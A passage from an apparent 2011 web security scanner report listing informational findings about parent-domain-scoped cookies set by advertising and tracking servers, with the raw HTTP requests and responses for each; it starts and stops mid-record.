Set-Cookie: rsi_segs_1000000=pUPFecPC7nMQFmLKHV2YkRHDFb4MHts9wYbNBNVkVMlSqYeIB48s6jNq5rQRfJuujAOkBmKgLSisXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kb/UXziqs3OeNfF8Ao1v9+u7SMzxg3Di8QrmRiZeiI7/W1J7gLPe3aStI9uT91NmYsK/+20IUfTD2rpLQyT66Y1DyWp2L4xjiTUCECLmgubnP; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:51 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:49:50 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

11.35. http://pix04.revsci.net/J06575/b3/0/3/1008211/66697159.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1008211/66697159.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1008211/66697159.js?D=DM_LOC%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Ftopics%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Fpost%252F2011%252F09%252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%252F1%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=...[SNIP]...; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="...[SNIP]..."; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_o6zg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDT9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZkg8RmyafY39+OIzF9755x3W+AzJvvU=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UWJs=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKlxLHFKzz4/0koCkSq5JBQoSmi7zZNoLT0dEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgq9z/0E1nIO9J9fupr6fHiqjuefo+lRV1atV4Hbe4J0B6z/RoE1OlugGgSP3MMlt9IUJJODkKZG3Nw4/m9kHTtC0hHopLYwirAifOKc5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGbzaZd2dky0d4PEM7QRN8YWclW7vMsiT9xDxB5BqTRyycw9kjP7n9k0mBN23/26VyDWsQXbFP9hc6xcdJ56gbc9aoDyd417qJh1f5VYyOgv3kiC8XFanPbQJ092ArYD50B0UuBaXIAGAg5g=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
Set-Cookie: udm_0=...[SNIP]...; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:49:53 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

11.36. http://pixel.mathtag.com/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match&mm_bnc,%20http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4e62cac5-3093-5789-301b-6f4e7fbf3921; ts=1315097285

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f38 32568
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 00:56:32 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921
Connection: Keep-Alive
Set-Cookie: ts=1315097792; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:56:32 GMT
Content-Length: 0


11.37. http://r.casalemedia.com/rum

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /rum

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rum?cm_dsp_id=4&external_user_id=2925993182975414771 HTTP/1.1
Host: r.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMS=102679&1315097055; CMSC=TmLJ3w**; CMDD=AAF1owE*; CMD1=AAFehU5iyd8AAZEXAAOXuwEBAA**; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMST=TmLJ305iysIC; CMIMP=102679&1315097282

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 00:56:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:56:38 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=e9e8c1d58f5f3be19a1c66cf;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
Set-Cookie: CMPS=054;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:56:38 GMT
Set-Cookie: CMPP=002;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:56:38 GMT
Set-Cookie: CMRUM2=04000000002925993182975414771;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
Set-Cookie: CMST=TmLJ305izMYG;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:56:38 GMT

GIF89a.............!.......,...........D..;

11.38. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=2925993182975414771 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:48 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Tue, 03-Sep-2013 00:56:48 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.39. http://r.turn.com/r/bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=54&cver=1&uid=6422714091563403120 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; uid=2925993182975414771; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=8071372312438671107; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:58:56 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:58:55 GMT

GIF89a.............!.......,...........D..;

11.40. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=ItQwH2bCmVTfAECOql6s6SBT_BPJF-JVRX_nTmRBhFpwzH1UaDhfAXHNoQU6yinlbmW-EFxMQzXn3d_bHBz1AQ&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:47:35 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1166786&t=2
Content-Length: 0
Date: Sun, 04 Sep 2011 00:47:35 GMT


11.41. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/cms/id/0/ddc/1/pid/43/uid/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; uid=2925993182975414771; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=6981538011179690654; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:57:37 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:57:36 GMT

GIF89a.............!.......,...........D..;

11.42. http://rma-api.gravity.com/v1/beacons/initialize

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839

Response

HTTP/1.1 200 OK
Server: ""
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 70
Date: Sun, 04 Sep 2011 01:01:00 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:00 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b39839');

11.43. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgdv12=1; lgdv6=1; lgdv95=1; lgdv73=1; lgtix=BgABADMBSQABADMBHAABADMBDAABADMB/QABADABXwABADMB

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:19 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAADADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:52:19 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

11.44. http://sync.adap.tv/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?type=gif&key=turn&uid=2925993182975414771 HTTP/1.1
Host: sync.adap.tv
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: asptvw1="ap4148%2C1%2C2011-09-03%2F18-44-50"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}"; rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A44%3A51+PDT+2011:32-Compatible=true,key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A59"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A57%3A27+PDT+2011:32-Compatible=true,key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:44:07 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

11.45. http://sync.mathtag.com/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f3c 32572
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 00:55:52 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921
Connection: Keep-Alive
Set-Cookie: ts=1315097752; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:55:52 GMT
Content-Length: 0


11.46. http://syndication.mmismm.com/tntwo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /tntwo.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&r=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&t=300?tm=330352 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:33 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=WyBPG2WuR0m9hGPSaL94eQ--; expires=Sat, 03-Sep-2016 07:13:33 GMT; path=/; domain=.mmismm.com
Content-Length: 43
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/javascript

var msegs='';Mindset.handleResponse(msegs);

11.47. http://tacoda.at.atwola.com/rtx/r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

